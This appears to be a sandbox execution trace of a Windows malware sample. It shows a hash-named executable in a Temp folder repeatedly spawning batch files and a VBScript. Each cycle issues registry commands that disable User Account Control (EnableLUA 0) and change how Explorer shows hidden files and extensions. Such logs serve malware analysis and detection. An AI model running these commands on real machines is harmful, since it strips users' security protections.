cmd /c ""C:\Users\Admin\AppData\Local\Temp\qIEoAUEc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\qMsMgIUg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cAcokEoE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\omIEwMIA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QokkMgAU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\MmMMQYkE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\rCIYUQkw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HuskYQss.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LowMYYIM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ryYQIMAw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UIsQUAAc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gWUYcMgM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\YEwMQgkg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CeYkMwgg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "680255874-6637947-768757941-1243019195270051239-1845780151-1192395231-358503286"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hWIkIEQk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zSEAQkUU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\dkAsYsQU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\mcQEkIcU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eskssMcs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CQgIEkQc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PmkkosQo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20195434361863332270-1830220939-15463510359219625776395715451510524414-1518471332"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fSoMkAwc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\bksooMAw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cCAgIYwU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1426107088864322520-255081647-94785146918805344171271362695-980105618-1107187368"

C:\Windows\SysWOW64\cmd.exe

